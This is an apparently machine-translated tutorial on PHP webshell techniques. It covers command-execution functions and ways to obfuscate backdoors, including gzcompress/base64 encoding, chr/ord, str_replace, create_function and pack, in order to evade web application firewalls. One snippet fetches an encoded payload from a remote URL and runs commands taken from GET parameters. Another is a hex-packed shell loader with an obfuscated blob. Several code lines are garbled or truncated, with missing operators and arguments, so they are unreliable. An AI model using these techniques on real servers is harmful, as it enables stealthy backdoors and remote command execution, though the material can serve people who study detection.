PHP Webshell Common functions

0x1

The function is called immediately after the string variable is appended with parentheses:

<? PHP $s = ' system '; $e = ' assert '; $s (' WhoAmI '); $e (' Phpinfo (); ');

0x2

Functions commonly used to execute commands are:

system (' command ')eval(' PHP code ')assert(' PHP code ')

These three most commonly used

0x3

Base64_encode/base64_decode

<? PHP $b Base64_encode (' WhoAmI '); Echo $b. ' <br/> '; Echo Base64_decode ($b). ' <br/> ';

0x4

Gzcompress/gzuncompress compressing data

<? PHP $c gzcompress (' WhoAmI '); Echo $c. ' <br> '; Echo gzuncompress ($c). " <br/> ";

0x5

From the above command execution, Base64 plus 64 encoded with GZ compression, we can write a backdoor like this.

First, the back door compression, and then the back door Base64_encode (base64 code to prevent the character cause codes error).

If the backdoor is a PHP code, in the end we can use assert or eval to execute it.

In PHP, there is a function like this:

file_get_contents (URL)

This function allows you to save the contents of a file remotely to a variable:

$shell file_get_contents (' Http://localhost/shell.jpg ')

Start testing, starting with the simplest examples.

Make gzcompress and Base64_encode encoded files:

<? PHP $c = ' System '; $data gzcompress ($c); $file _data Base64_encode ($data); Echo $file _data ; fwrite (fopen$file _data);

So we've created a system string that's compressed and then 64 encoded.

Use:

<? PHP $c file_get_contents (' Http://localhost/shell.txt '); # Get Data $s gzuncompress (base64_decode($c)); # Decrypt Data $s ($_get[session]); # Execute Command

So the question is, why do we have to turn a big circle and come back?

The reason is simple, you compress the data, it is possible that some WAF does not detect the content is dangerous.

0x6

ASCII transcoding function: Chr/ord

<? PHP $str = ' System ';  for ($count$countstrlen($str$count+ +)    {echo  substr($str$count, 1). ' ~ '. Ord (substr($str$count, 1)). ' <br/> ';}
/*
s~115
y~121
s~115
t~116
E~101
m~109*/

0x7

Str_replace Character substitution function:

<? PHP $s Str_replace (' P ', ', ' pspypsptpepmp '); Echo $s;
#system

0x8

Create_fuction () to create an anonymous function:

<? PHP # create_function (' parameter list ', ' PHP code string '); $info create_function (', ' phpinfo (); ' ); $info ();

0x9

Pack function

Pack (' Format ', hex string)

The pack function is a bit complicated, but not commonly used, if you want to convert a hexadecimal character, you can:

<? PHP $x Bin2Hex (' System '); $s PACK $x ); Echo $s. ' <br/> '; $s (' WhoAmI ');

The key usage of pack is that we can turn some sense functions into 16, then pack them back.

For example, Create_function (", $shell), $shell PHP code, we can use to hide some sensitive functions in PHP code.

 <? php   $shell  =pack  (' h* ', ' 2470617373776f72643d27 ').  $password . pack  (' h* ', ' 273b247368656c6c6e616d653d27 ').  $Username . pack  (' h* ', ' 273b246d7975726c3d27 ').  $Url . pack  (' h* ', ' 273b6576616c28677a756e636f6d7072657373286261736536345f6465636f64652827 '). ' ejzs/xt3hnd5jor/zazl71buw2rawqxu1uuqsopkgheabebslkid02g0gcyaaki7qyci+geczzxohm+ kjetiwzdbkmnzsi1fkmxhyzot8wqyk/hpcybjtjkzjln+z7n3vxvvx0bqtppjoozeoltq3/d73+/77tb6wqdbbxfhj2y/ 8zsb9c3gxn28vhunurhrrnc65cmxtzvo+vq0/hh5jvheuly6fi9cjba9s1h5ixyn/vanu18vffjnsnxeyl/ubnebzb3qbh3vs8/fhg/atbwuf/ Mistn+yfa9u7zb3wru. $f = Create_function ( " 

Pack usage can be a filial piety here: Perl pack

Summarize

Create a GZ compression and Base64 encoded file (such as Logo.png), which is obtained using file_get_contents.

Use the Str_replace/chr/ord/create_fuction function to bypass some WAF detection.

PHP Webshell Common functions